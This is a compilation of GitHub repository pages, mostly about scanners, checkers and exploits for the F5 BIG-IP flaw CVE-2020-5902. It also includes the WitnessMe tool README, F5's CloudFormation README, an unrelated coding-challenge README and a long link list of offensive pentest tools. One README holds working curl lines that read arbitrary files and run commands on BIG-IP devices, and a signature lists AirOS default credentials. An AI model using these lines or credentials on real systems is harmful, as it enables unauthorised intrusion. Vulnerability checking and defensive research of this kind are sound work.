  witnessme 10.0.1.0/24 192.168.0.1-20 ~/my_nessus_scan.nessus ~/my_nmap_scan.xml

After the scan is finished, a folder will have been created in the current directory with the results. Access the results using the wmdb command line utility:
  wmdb scan_2020_$TIME/

To quickly identify F5 load balancers, first perform a signature scan using the scan command. Then search for "BIG-IP" or "F5" using the servers command (this will search for the "BIG-IP" and "F5" string in the signature name, page title and server header).

Additionally, you can generate an HTML or CSV report using the following commands:
  WMDB ≫ generate_report html
  WMDB ≫ generate_report csv

You can then copy the entire scan folder, which will contain all of the reports and results, to your host machine by copying it to the /transfer folder.

Installation

Docker

Running WitnessMe from a Docker container is fully supported and is the recommended way of using the tool. Pull the image from Docker Hub:
  docker pull byt3bl33d3r/witnessme

You can then spin up a docker container, run it like the main witnessme.py script and pass it the same arguments:
  docker run --rm -ti $IMAGE_ID https://google.com 192.168.0.1/24

Deploying to the Cloud (™)

Since WitnessMe has a RESTful API now, you can deploy it to the magical cloud and perform scanning from there. This would have a number of benefits, including giving you a fresh external IP on every scan (more OPSEC safe when assessing attack surface on Red Teams). There are a number of ways of doing this; you can obviously do it the traditional way (e.g. spin up a machine, install docker etc.). Recently cloud service providers started offering ways of running Docker containers directly in a fully managed environment. Think of it as serverless functions (e.g. AWS Lambdas) only with Docker containers. This would technically allow you to really quickly deploy and run WitnessMe (or really anything in a Docker container) without having to worry about underlying infrastructure and removes a lot of the security concerns that come with that. Below are some of the ones I've tried along with the steps necessary to get it going and any issues I encountered.

GCP Cloud Run

Cloud Run is by far the easiest of these services to work with. This repository includes the cloudbuild.yaml file necessary to get this setup and running. Unfortunately, it seems like Cloud Run doesn't allow outbound internet access to containers; if anybody knows of a way to get around this please get in touch.

From the repository's root folder (after you authenticated and setup a project), these two commands will automatically build the Docker image, publish it to the Gcloud Container Registry and deploy a working container to Cloud Run:
  gcloud builds submit --config cloudbuild.yaml
  gcloud run deploy --image gcr.io/$PROJECT_ID/witnessme --platform managed

The output will give you a HTTPS url to invoke the WitnessMe RESTful API from :)

When you're done:
  gcloud run services delete witnessme
  gcloud container images delete gcr.io/$PROJECT_ID/witnessme

AWS ECS/Fargate

TO DO

Usage & Examples

There are 3 main scripts:
  - witnessme.py: is the main CLI interface.
  - wmdb.py: allows you to browse the database (created on each scan) to view results.
  - wmapi.py: provides a RESTful API to schedule, start, stop and monitor scans.

  usage: witnessme.py [-h] [-p PORTS [PORTS ...]] [--threads THREADS] [--timeout TIMEOUT] target [target ...]

  positional arguments:
    target                The target IP(s), range(s), CIDR(s) or hostname(s)

  optional arguments:
    -h, --help            show this help message and exit
    -p PORTS [PORTS ...], --ports PORTS [PORTS ...]
                          Ports to scan if IP Range/CIDR is provided (default: [80, 8080, 443, 8443])
    --threads THREADS     Number of concurrent threads (default: 20)
    --timeout TIMEOUT     Timeout for each connection attempt in seconds (default: 15)

Can accept a mix of .Nessus file(s), Nmap XML file(s), files containing URLs and/or IPs, IP addresses/ranges/CIDRs and URLs. Long story short, it should be able to handle anything you throw at it:
  python witnessme.py 192.168.1.0/24 192.168.1.10-20 https://bing.com ~/my_nessus_scan.nessus ~/my_nmap_scan.xml ~/myfilewithURLSandIPs

Note: as of writing, WitnessMe detects .Nessus and NMap files by their extension, so make sure Nessus files have a .nessus extension and NMap scans have a .xml extension.

If an IP address/range/CIDR is specified as a target, WitnessMe will attempt to screenshot HTTP & HTTPS pages on ports 80, 8080, 443, 8443 by default. This is customizable with the --port argument.

Once a scan is completed, a folder with all the screenshots and a database will be in the current directory; point wmdb.py to the database in order to see the results.
  python wmdb.py scan_2019_11_05_021237/witnessme.db

Pressing tab will show you the available commands and a help menu.

Searching the Database

The servers and hosts commands in the wmdb.py CLI accept 1 argument. WMCLI is smart enough to know what you're trying to do with that argument.

Server Command

No arguments will show all discovered servers. Passing it an argument will search the title and server columns for that pattern (it's case insensitive). For example, if you wanted to search for all discovered Apache Tomcat servers:
  servers tomcat
or
  servers 'apache tomcat'
Similarly, if you wanted to find servers with 'login' in the title:
  servers login

Hosts Command

No arguments will show all discovered hosts. Passing it an argument will search the IP and Hostname columns for that pattern (it's case insensitive). If the value corresponds to a Host ID it will show you the host information and all of the servers discovered on that host, which is extremely useful for reporting purposes and/or when targeting specific hosts.

Signature Scan

You can perform a signature scan on all discovered services using the scan command.

Call for Signatures!

If you run into a new webapp write a signature for it! It's beyond simple and they're all in YAML! Don't believe me? Here's the AirOS signature (you can find them all in the signatures directory):

  credentials:
    - password: ubnt
      username: ubnt
  name: AirOS
  signatures:
    - airos_logo.png
    - form enctype="multipart/form-data" id="loginform" method="post"
    - align="center" class="loginsubtable"
    - function onLangChange()
  # AirOS ubnt/ubnt

Yup that's it. Just plop it in the signatures folder and POW! Done.

Preview Screenshots Directly in the Terminal (ITerm2 on MacOSX)

If you're using ITerm2 on MacOSX, you can preview screenshots directly in the terminal using the show command.

To Do
  - Store server info to a database
  - HTML report generation
  - Command line script to search database
  - Support NMap & .nessus files as input
  - Web server categorization
  - Signature scanning
  - Accept URLs as targets (stdin, files)
  - Add support for previewing screenshots in *nix terminals using w3m

About: Web Inventory tool, takes screenshots of webpages using Pyppeteer (headless Chrome/Chromium) and provides some extra bells & whistles to make life easier.
License: GPL-3.0 License
Releases: No releases published
Sponsor this project: byt3bl33d3r (patreon.com/byt3bl33d3r, ko-fi.com/byt3bl33d3r)
Packages: witnessme (latest), witnessme-stages (1)
Languages: Python 90.1%, HTML 8.2%, Other 1.7%

Repository: CVE-2020-5902-Scanner (committer: Technowlogy-Pushpender)
Latest commit: a981de6, 14 minutes ago, "Add files via upload" (2 commits, 1 branch, 0 tags)
Files:
  CVE-2020-5902.py - Add files via upload (14 minutes ago)
  README.md - Initial commit (16 minutes ago)
README.md:
CVE-2020-5902-Scanner
Automated F5 Big IP Remote Code Execution (CVE-2020-5902) Scanner Written In Python 3
About: Automated F5 Big IP Remote Code Execution (CVE-2020-5902) Scanner Written In Python 3
Releases: No releases published

Repository: RCE-CVE-2020-5902 (committer: JSec1337)
Latest commit: 9e5d283, 6 minutes ago, "Create README.md" (1 commit, 1 branch, 0 tags)
Files:
  README.md - Create README.md (6 minutes ago)
README.md:
RCE-CVE-2020-5902
BIG-IP F5 Remote Code Execution
About: BIG-IP F5 Remote Code Execution
Releases: No releases published

Repository: f5-aws-cloudformation (committer: crosbygw)
Latest commit: bd9ea7a, 5 minutes ago, "Update README.md" (78 commits, 2 branches, 52 tags)
Files:
  .github - View release notes for v4.1.3 (16 months ago)
  AMI Maps - View release notes for v5.3.0 (5 months ago)
  deploy - View release notes for v5.0.1 (12 months ago)
  experimental - View release notes for v5.6.0 (last month)
  iApps - View release notes for v4.2.0 (14 months ago)
  images - View release notes for v2.7.1 (2 years ago)
  supported - View release notes for v5.6.0 (last month)
  .gitattributes - View release notes for v3.2.0 (2 years ago)
  README.md - Update README.md (5 minutes ago)
  aws-bigip-version-matrix.md - View release notes for v5.6.0 (last month)
  aws-troubleshooting.md - View release notes for v5.2.0 (7 months ago)
  aws-update-bigip-image.md - View release notes for v2.7.1 (2 years ago)
  slack-channel-statement.md - View release notes for v2.8.0 (2 years ago)
  template-index.md - View release notes for v5.2.0 (7 months ago)
README.md:

F5 AWS CloudFormation templates

CVE-2020-5902

Warning: due to CVE-2020-5902, do not use templates unless using the customImageId parameter. Updated images are pending publication to Marketplace. Please see CVE-2020-5902 and Cloud Provider for latest updates.

Introduction

Welcome to the GitHub repository for F5's CloudFormation templates for deploying F5 in Amazon Web Services. All of the templates in this repository have been developed by F5 Networks engineers. For information on getting started using F5's CFT templates on GitHub, see Amazon Web Services: Solutions 101 and the README files in each directory.

Across all branches in this repository, there are two directories: supported and experimental.

supported: The supported directory contains CloudFormation templates that have been created and fully tested by F5 Networks. These templates are fully supported by F5, meaning you can get assistance if necessary from F5 Technical Support via your typical methods.

experimental: The experimental directory also contains CloudFormation templates that have been created by F5 Networks. However, these templates have not completed full testing and are subject to change. F5 Networks does not offer technical support for templates in the experimental directory, so use these templates with caution.

Template information

Descriptions for each template are contained at the top of each template in the Description key. For additional information, including how the templates are generated, and assistance in deploying a template, see the README file on the individual template pages. Standalone and HA production stack templates have been deprecated; a new parameter has been added to existing-stack templates to control deployment of public IP addresses.

Matrix for tagged releases

F5 has created a matrix that contains all of the tagged releases of the F5 Cloud Formation Templates (CFTs) for Amazon AWS, and the corresponding BIG-IP versions, license types, and throughput levels available for a specific tagged release. See the AWS Matrix.

Quick Start

The quickstart template allows you to quickly launch an auto scale group of BIG-IP VEs into AWS to demonstrate a typical micro services use case and/or Blue and Green deployment strategy. For detailed information, we recommend you first see the Quick Start README file, or you can use the Launch Stack button to get started.

All F5 Supported templates for AWS

To see a list of all of our supported AWS CloudFormation templates, see the AWS Supported Template index.

Troubleshooting and Known Issues

To see steps for troubleshooting common problems with AWS CloudFormation, see the Troubleshooting Steps section. All known issues are on GitHub for better tracking and visibility. See issues with a label of Known Issues at https://github.com/f5networks/f5-aws-cloudformation/issues.

Copyright

Copyright 2014-2019 F5 Networks Inc.

License

Apache V2.0. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at: http://www.apache.org/licenses/LICENSE-2.0. Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

Contributor License Agreement

Individuals or business entities who contribute to this project must have completed and submitted the F5 Contributor License Agreement.

About: CloudFormation Templates for quickly deploying BIG-IP services in Amazon Web Services EC2
Topics: cloudformation-template, f5networks, f5, aws-ec2, auto-scaling
Releases: 52 (v5.6.0, Latest, on Jun 5; + 51 releases)
Contributors: 10
Languages: Shell 91.2%, Python 6.2%, Tcl 2.6%

Latest commit: zwdOr, "Adding README file" (5 commits, 1 branch, 0 tags)
Files: .vs/GemographyBackendChallenge, Controllers, Interfaces, Models, Properties, obj, .dockerignore, .gitignore, DockerFile, GemographyBackendChallenge.csproj, GemographyBackendChallenge.csproj.user, GemographyBackendChallenge.sln, Program.cs, README.md, Startup.cs, appsettings.Development.json, appsettings.json

README.md: gemography : backend-coding-challenge

Requirement
Develop a REST microservice that lists the languages used by the 100 trending public repos on GitHub. For every language, you need to calculate the attributes below:
- Number of repos using this language
- The list of repos using the language

Dotnet build & run approach
NB: dotnet core 2.0 or a higher version is required to run the project.
dotnet build
dotnet run
API endpoint: http://localhost:5000/TrendingRepos/{language}
Example request: http://localhost:5000/TrendingRepos/java
Response: JSON object with the schema
{ "language" : "java", "total_count": "53537", "items" : {"id": 277342661, "node_id": "MDEwOlJlcG9zaXRvcnkyNzczNDI2NjE=", "name": "CVE-2020-5902", "full_name": "jas502n/CVE-2020-5902", "private": false, "owner": { "login": "jas502n", "id": 16593068, "node_id": "MDQ6VXN" .... }

Docker running approach
If you don't have any dotnet core version installed, I created a docker image to run the project in a docker container. Open cmd and run:
docker build -t backendchallenge .
docker run -d -p 8080:80 --name webapi backendchallenge
(The image tag passed to docker run must match the tag given to docker build; the original README used two different names.)
API endpoint: http://localhost:8080/TrendingRepos/{language}
Example request: http://localhost:5000/TrendingRepos/java
Response: JSON object
{"language":"java", "total_count":"53537", "items":[]}
with the same item schema as above.

About: No description, website, or topics provided.
Releases: No releases published
Languages: C# 100.0%

Latest commit: Un4gi, "Update README.md" (2 commits, 1 branch, 0 tags)
Files: README.md

README.md: CVE-2020-5902
Proof of Concept for CVE-2020-5902

LFI
curl -v -k 'https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/path/to/file

RCE
curl -v -k 'https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

About: Proof of Concept for CVE-2020-5902
Releases: No releases published

Latest commit: JaneMandy, "Initial commit" (1 commit, 1 branch, 0 tags)
Files: README.md

README.md: CVE-2020-5902
CVE-2020-5902 Exploit

About: CVE-2020-5902 Exploit
Releases: No releases published

Latest commit: jas502n, "Initial commit" (1 commit, 1 branch, 0 tags)
Files: README.md

README.md: CVE-2020-5902
CVE-2020-5902 BIG-IP

About: CVE-2020-5902 BIG-IP
Releases: No releases published

Latest commit: deepsecurity-pe, "Update README.md" (2 commits, 1 branch, 0 tags)
Files: README.md

README.md: GoF5-CVE-2020-5902
Script and binary to validate the critical vulnerability in the F5 BIG-IP Traffic Management User Interface (TMUI) (CVE-2020-5902), written in Golang.

About: Script to validate CVE-2020-5902, written in Go.
Releases: No releases published

Latest commit: inho28, "Initial commit" (1 commit, 1 branch, 0 tags)
Files: README.md

README.md: CVE-2020-5902-F5-BIGIP
Scan from a given list for F5 BIG-IP and check for CVE-2020-5902.

About: Scan from a given list for F5 BIG-IP and check for CVE-2020-5902
Releases: No releases published

Latest commit: MrCl0wnLab, "Initial commit" (1 commit, 1 branch, 0 tags)
Files: LICENSE, README.md

README.md: checker-CVE-2020-5902
Checker CVE-2020-5902: BIG-IP versions 15.0.0 through 15.1.0.3, 14.1.0 through 14.1.2.5, 13.1.0 through 13.1.3.3, 12.1.0 through 12.1.5.1, and 11.6.1 through 11.6.5.1 suffer from Traffic Management User Interface (TMUI) arbitrary file read and command execution vulnerabilities.

About: Checker CVE-2020-5902 (same description as the README)
License: Apache-2.0
Releases: No releases published

Latest commit: momika233, "Create cve-2020-5902.nse" (2 commits, 1 branch, 0 tags)
Files: cve-2020-5902.nse, readme.md

readme.md: NMAP script for F5 BIG-IP "TMUI" RCE Vulnerability
Reference: https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse

About: No description, website, or topics provided.
Releases: No releases published
Languages: Lua 100.0%

Latest commit: GovindPalakkal, "Update README.md" (4 commits, 1 branch, 0 tags)
Files: README.md, Screen Shot 2020-07-08 at 4.54.59 PM.png, cve-checker.sh

README.md: Cve-2020-5029-finder
A small script, written in bash, to find the subdomains/IPs vulnerable to CVE-2020-5902.

Affected Version
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.

Usage
To use this you need httprobe installed.
# configuration: first list the subdomains in list.txt (with http/https); you can use httprobe for this
cat list.txt | httprobe | tee -a domains
(here the IPs/domains are stored as http:// or https://xx.xx.xx.xx)
./cve-checker.sh /user/path_to_filtered_domains

About: A small script to find the subdomains/IPs vulnerable to CVE-2020-5902, written in bash
Releases: No releases published
Languages: Shell 100.0%

Latest commit: wdlid, "Create fix" (1 commit, 1 branch, 0 tags)
Files: fix

About: Fix CVE-2020-5902
Releases: No releases published
Languages: Shell 100.0%

Latest commit: TheCyberViking, "Delete f5pocmultiscan.py" (7 commits, 1 branch, 0 tags)
Files: .gitignore, F5pocscan.py, LICENSE, README.md

README.md: CVE-2020-5902 Vulnerability Checker

While looking at the vulnerability with fellow researchers we came to the idea that most of the current ways to test for the vulnerability can be classed as a form of compromise of the system. We wanted to develop a way to test for the vulnerability that does not compromise the system being scanned. For this we wrote this small Python tool. It does a GET request to the login page of the system; this shows that the system is available and viewable and could be open to compromise from an attacker, and in turn does not compromise any system information or client data.

What is F5 BIG-IP
The F5 BIG-IP DNS uses topology-based load balancing to inspect a user's IP and determine the most efficient data center. The term load balancing can also refer to file servers, when file protocol requests are distributed across file servers to overcome the capacity, bandwidth, or CPU limitations of any single system.

That one singular quote should give you an idea VERY quickly why this is a critical vulnerability, combined with the simplicity of the attack seen below.

CVE-2020-5902
This is a critical CVSS 10.0 vulnerability discovered in F5 BIG-IP systems, in versions 5.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1. In the exploitation process the attacker needs to send a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration. More information on the vulnerability can be found from F5 support at https://support.f5.com/csp/article/K52145254

Exploitation
The exploitation is straightforward, very public at present, and simplistic, using a simple GET request or a curl command that can be run by any skid with an up-to-date Windows command prompt:

Acknowledgement
This tool was written by me, CyberViking, and a fellow researcher who wanted to remain nameless; you know who you are, you beautiful bitch. If you have any suggestions hit me up @TheCyberViking

About: Simple Vulnerability Checker written by me "@TheCyberViking" and a fellow researcher who wanted to be left nameless... you know who you are, you beautiful bitch
License: MIT
Releases: No releases published
Languages: Python 100.0%

Latest commit: ihebski, "Update README.md" (10 commits, 1 branch, 0 tags)
Files: BIG-IPF5_CVE-2020-5902.sh, README.md, citrix_CVE-2019-19781.sh, scan_cisco_asa_CVE-2020-3452.sh, template.sh

README.md: are_we_vulnerable
Checking the recently disclosed vulnerabilities over the network.
- BIG-IP F5 (CVE-2020-5902) - https://github.com/yasserjanah/CVE-2020-5902
- Citrix Application Delivery Controller and Citrix Gateway (CVE-2019-19781) - https://github.com/mpgn/CVE-2019-19781
- Cisco Adaptive Security Appliance and Firepower Threat Defense (CVE-2020-3452) - https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-3452.nse

Usage
$ echo "host1 host2 host3" | ./scanner
Reading input from a file:
$ cat myservers.txt | ./scanner

About: checking the recently disclosed vulnerabilities over the network.
Topics: citrix, bigipf5, cisco-asa
Languages: Shell 100.0%

Latest commit: AnonVulc, "Create README.md" (1 commit, 1 branch, 0 tags)
Files: README.md

README.md: Pentest-Tools

Categories:
General useful Powershell Scripts
AMSI Bypass restriction Bypass
Payload Hosting
Network Share Scanner
Lateral Movement
Reverse Shellz
POST Exploitation
Pivot
Backdoor finder
Persistence on windows
Web Application Pentest
Framework Discovery
Framework Scanner / Exploitation
Web Vulnerability Scanner / Burp Plugins
Network- / Service-level Vulnerability Scanner
Crawler
Web Exploitation Tools
Windows Privilege Escalation / Audit
T3 Enumeration
Linux Privilege Escalation / Audit
Credential harvesting Windows Specific
Credential harvesting Linux Specific
Data Exfiltration - DNS/ICMP/Wifi Exfiltration
Git Specific
Reverse Engineering / decompiler
Forensics
Network Attacks
Specific MITM service Exploitation
Sniffing / Evaluation / Filtering
Scanner / Exploitation-Frameworks / Automation
Default Credential Scanner
Payload Generation / AV-Evasion / Malware Creation
Domain Finding / Subdomain Enumeration
Scanner network level
Email Gathering
Domain Auth + Exploitation
Network service - Login Brute Force + Wordlist attacks
Command & Control Frameworks
Wifi Tools
Raspberry PI Exploitation
Social Engineering
Wordlists / Wordlist generators
Obfuscation
Source Code Analysis
No category yet
Industrial Control Systems
NAC bypass
JMX Exploitation
And many more.

I created this repo to have an overview over my starred repos. I was not able to filter in categories before. Feel free to use it for yourself. I do not list Kali default tools as well as several testing tools which are state of the art. STRG+F searches are helpful here.

Windows Active Directory Pentest

General useful Powershell Scripts
https://github.com/S3cur3Th1sSh1t/WinPwn
https://github.com/dafthack/MailSniper
https://github.com/putterpanda/mimikittenz
https://github.com/dafthack/DomainPasswordSpray
https://github.com/mdavis332/DomainPasswordSpray - same but kerberos auth for more stealth and lockout-sleep
https://github.com/jnqpblc/SharpSpray - domainpasswordspray executable with lockout-sleep
https://github.com/Arvanaghi/SessionGopher
https://github.com/samratashok/nishang
https://github.com/PowerShellMafia/PowerSploit
https://github.com/fdiskyou/PowerOPS
https://github.com/giMini/PowerMemory
https://github.com/Kevin-Robertson/Inveigh
https://github.com/MichaelGrafnetter/DSInternals
https://github.com/PowerShellEmpire/PowerTools
https://github.com/FuzzySecurity/PowerShell-Suite
https://github.com/hlldz/Invoke-Phant0m
https://github.com/leoloobeek/LAPSToolkit
https://github.com/sense-of-security/ADRecon
https://github.com/Arno0x/PowerShellScripts
https://github.com/S3cur3Th1sSh1t/Grouper
https://github.com/l0ss/Grouper2
https://github.com/NetSPI/PowerShell
https://github.com/NetSPI/PowerUpSQL
https://github.com/GhostPack - Various Powersploit Tasks in C#
https://github.com/Kevin-Robertson/Powermad - Adidns Attacks

AMSI Bypass restriction Bypass
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
https://github.com/p3nt4/PowerShdll
https://github.com/jaredhaight/PSAttack
https://github.com/Cn33liz/p0wnedShell
https://github.com/cobbr/InsecurePowerShell
https://github.com/Mr-Un1k0d3r/PowerLessShell
https://github.com/bitsadmin/nopowershell - C# Powershell
https://github.com/OmerYa/Invisi-Shell
https://github.com/Hackplayers/Salsa-tools - Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP and AV bypass, AMSI patched
https://github.com/padovah4ck/PSByPassCLM - Constrained language mode bypass
https://github.com/rasta-mouse/AmsiScanBufferBypass
https://github.com/itm4n/VBA-RunPE - Applocker Bypass
https://github.com/cfalta/PowerShellArmoury
https://github.com/Mr-B0b/SpaceRunner - This tool enables the compilation of a C# program that will execute arbitrary PowerShell code, without launching PowerShell processes through the use of runspace.
https://github.com/RythmStick/AMSITrigger - The Hunt for Malicious Strings
https://github.com/rmdavy/AMSI_Ordinal_Bypass - Bypass AMSI and Defender using Ordinal Values in VBS
https://github.com/mgeeky/Stracciatella - OpSec-safe Powershell runspace from within C# (aka SharpPick) with AMSI, CLM and Script Block Logging disabled at startup
https://github.com/med0x2e/NoAmci - Using DInvoke to patch AMSI.dll in order to bypass AMSI detections triggered when loading .NET tradecraft via Assembly.Load().

Payload Hosting
https://github.com/kgretzky/pwndrop - Self-deployable file hosting service for red teamers, allowing to easily upload and share payloads over HTTP and WebDAV.
https://github.com/sc0tfree/updog - Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.

Network Share Scanner
Find Juicy Stuff
https://github.com/SnaffCon/Snaffler - a tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4
https://github.com/djhohnstein/SharpShares - Enumerate all network shares in the current domain. Also, can resolve names to IP addresses.
https://github.com/vivami/SauronEye - Search tool to find specific files containing specific words, i.e. files containing passwords.
https://github.com/leftp/VmdkReader - .NET 4.0 Console App to browse VMDK / VHD images and extract files

Reverse Shellz
https://github.com/xct/xc - A small reverse shell for Linux & Windows
https://github.com/cytopia/pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and it's fully scriptable with Python (PSE)
https://github.com/Kudaes/LOLBITS - C# reverse shell using Background Intelligent Transfer Service (BITS) as communication protocol and direct syscalls for EDR user-mode hooking evasion.

Backdoor finder
https://github.com/linuz/Sticky-Keys-Slayer
https://github.com/ztgrace/sticky_keys_hunter
https://github.com/countercept/doublepulsar-detection-script

Lateral Movement
https://github.com/0xthirteen/SharpRDP
https://github.com/0xthirteen/MoveKit - WMI, SMB, RDP, SCM, DCOM Lateral Movement techniques
https://github.com/0xthirteen/SharpMove - WMI, SCM, DCOM, Task Scheduler and more
https://github.com/rvrsh3ll/SharpCOM - C# Port of Invoke-DCOM
https://github.com/malcomvetter/CSExec - An implementation of PSExec in C#
https://github.com/byt3bl33d3r/CrackMapExec
https://github.com/nccgroup/WMIcmd
https://github.com/rasta-mouse/MiscTools - CsExec, CsPosh (Remote Powershell Runspace), CsWMI, CsDCOM
https://github.com/byt3bl33d3r/DeathStar - Automate Getting Dom-Adm
https://github.com/SpiderLabs/portia - automated lateral movement
https://github.com/Screetsec/Vegile - backdoor / rootkit
https://github.com/DanMcInerney/icebreaker - automation for various mitm attacks + vulns
https://github.com/MooseDojo/apt2 - automated penetration toolkit
https://github.com/hdm/nextnet - Netbios Network interface Enumeration (discovery of dual homed hosts)
https://github.com/mubix/IOXIDResolver - Find dual homed hosts over DCOM
https://github.com/Hackplayers/evil-winrm
https://github.com/bohops/WSMan-WinRM - A collection of proof-of-concept source code and scripts for executing remote commands over WinRM using the WSMan.Automation COM object
https://github.com/dirkjanm/krbrelayx - unconstrained delegation, printer bug (MS-RPRN) exploitation, Remote ADIDNS attacks
https://github.com/Mr-Un1k0d3r/SCShell - Fileless lateral movement tool that relies on ChangeServiceConfigA to run command
https://github.com/rvazarkar/GMSAPasswordReader - AD Bloodhound 3.0 Path
https://github.com/fdiskyou/hunter
https://github.com/360-Linton-Lab/WMIHACKER - A Bypass Anti-virus Software Lateral Movement Command Execution Tool

POST Exploitation
https://github.com/mubix/post-exploitation
https://github.com/emilyanncr/Windows-Post-Exploitation
https://github.com/nettitude/Invoke-PowerThIEf - Automatically scan any windows or tabs for login forms and then record what gets posted. A notification will appear when some have arrived.
https://github.com/ThunderGunExpress/BADministration - McAfee Epo or Solarwinds post exploitation
https://github.com/bohops/SharpRDPHijack - A POC Remote Desktop (RDP) session hijack utility for disconnected sessions
https://github.com/antonioCoco/RunasCs - RunasCs - Csharp and open version of windows builtin runas.exe
https://github.com/klsecservices/Invoke-Vnc - Powershell VNC injector
https://github.com/mandatoryprogrammer/CursedChrome - Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies, allowing you to browse sites as your victims.
https://github.com/djhohnstein/WireTap - .NET 4.0 Project to interact with video, audio and keyboard hardware.
https://github.com/GhostPack/Lockless - Lockless allows for the copying of locked files.
https://github.com/slyd0g/SharpClipboard - C# Clipboard Monitor
https://github.com/hlldz/pickl3 - Windows active user credential phishing tool
https://github.com/infosecn1nja/SharpDoor - SharpDoor is an alternative RDPWrap written in C# to allow multiple RDP (Remote Desktop) sessions by patching the termsrv.dll file.
Wrapper for various tools
https://github.com/S3cur3Th1sSh1t/PowerSharpPack - Various .NET Tools wrapped in Powershell
https://github.com/bohops/GhostBuild - GhostBuild is a collection of simple MSBuild launchers for various GhostPack/.NET projects
https://github.com/rvrsh3ll/Rubeus-Rundll32 - rundll32 Wrapper for Rubeus

Pivot
https://github.com/0x36/VPNPivot
https://github.com/securesocketfunneling/ssf
https://github.com/p3nt4/Invoke-SocksProxy
https://github.com/sensepost/reGeorg - Webshell tunnel over socks proxy - pentesters dream
https://github.com/nccgroup/ABPTTS - TCP tunneling over HTTP/HTTPS for web application servers like reGeorg
https://github.com/RedTeamOperations/PivotSuite
https://github.com/trustedsec/egressbuster - check for internet access over open ports / egress filtering
https://github.com/vincentcox/bypass-firewalls-by-DNS-history
https://github.com/shantanu561993/SharpChisel - C# Wrapper around Chisel from https://github.com/jpillora/chisel - A fast TCP tunnel over HTTP
https://github.com/esrrhs/pingtunnel - ping tunnel is a tool that advertises tcp/udp/socks5 traffic as icmp traffic for forwarding.
https://github.com/sysdream/ligolo - Reverse Tunneling made easy for pentesters, by pentesters
https://github.com/nccgroup/SocksOverRDP - Socks5/4/4a Proxy support for Remote Desktop Protocol / Terminal Services / Citrix / XenApp / XenDesktop
https://github.com/blackarrowsec/mssqlproxy - mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse

Active Directory Audit and exploit tools
https://github.com/mwrlabs/SharpGPOAbuse
https://github.com/BloodHoundAD/BloodHound
https://github.com/BloodHoundAD/SharpHound3 - C# Data Collector for the BloodHound Project, Version 3
https://github.com/chryzsh/awesome-bloodhound
https://github.com/hausec/Bloodhound-Custom-Queries
https://github.com/vletoux/pingcastle
https://github.com/cyberark/ACLight
https://github.com/canix1/ADACLScanner
https://github.com/fox-it/Invoke-ACLPwn
https://github.com/fox-it/aclpwn.py - same as invoke-aclpwn but in python
https://github.com/dirkjanm/ldapdomaindump - Active Directory information dumper via LDAP
https://github.com/tothi/rbcd-attack - Kerberos Resource-Based Constrained Delegation Attack from Outside using Impacket
https://github.com/NotMedic/NetNTLMtoSilverTicket - SpoolSample -> Responder w/NetNTLM Downgrade -> NetNTLMv1 -> NTLM -> Kerberos Silver Ticket
https://github.com/FatRodzianko/Get-RBCD-Threaded - Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory environments

Persistence on windows
https://github.com/fireeye/SharPersist
https://github.com/outflanknl/SharpHide

Web Application Pentest

Framework Discovery
https://github.com/Tuhinshubhra/CMSeeK
https://github.com/Dionach/CMSmap - Wordpress, Joomla, Drupal Scanner
https://github.com/wpscanteam/wpscan
https://github.com/Ekultek/WhatWaf

Framework Scanner / Exploitation
https://github.com/wpscanteam/wpscan - wordpress
https://github.com/n00py/WPForce
https://github.com/m4ll0k/WPSeku
https://github.com/swisskyrepo/Wordpresscan
https://github.com/rastating/wordpress-exploit-framework
https://github.com/coldfusion39/domi-owned - lotus domino
https://github.com/droope/droopescan - Drupal
https://github.com/whoot/Typo-Enumerator - Typo3
https://github.com/rezasp/joomscan - Joomla

Web Vulnerability Scanner / Burp Plugins
https://github.com/m4ll0k/WAScan - all in one scanner
https://github.com/s0md3v/XSStrike - XSS discovery
https://github.com/federicodotta/Java-Deserialization-Scanner
https://github.com/d3vilbug/HackBar
https://github.com/gyoisamurai/GyoiThon
https://github.com/snoopysecurity/awesome-burp-extensions
https://github.com/BishopFox/GadgetProbe - Probe endpoints consuming Java serialized objects to identify classes, libraries, and library versions on remote Java classpaths.

Network- / Service-level Vulnerability Scanner
https://github.com/scipag/vulscan
https://github.com/zdresearch/OWASP-Nettacker

File / Directory / Parameter discovery
https://github.com/OJ/gobuster
https://github.com/nccgroup/dirble
https://github.com/maK-/parameth
https://github.com/devanshbatham/ParamSpider - Mining parameters from dark corners of Web Archives
https://github.com/s0md3v/Arjun
https://github.com/Cillian-Collins/dirscraper - Directory lookup from Javascript files
https://github.com/hannob/snallygaster
https://github.com/maurosoria/dirsearch
https://github.com/s0md3v/Breacher - Admin Panel Finder
https://github.com/mazen160/server-status_PWN

Crawler
https://github.com/s0md3v/Photon
https://github.com/kgretzky/dcrawl
https://github.com/lc/gau - Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
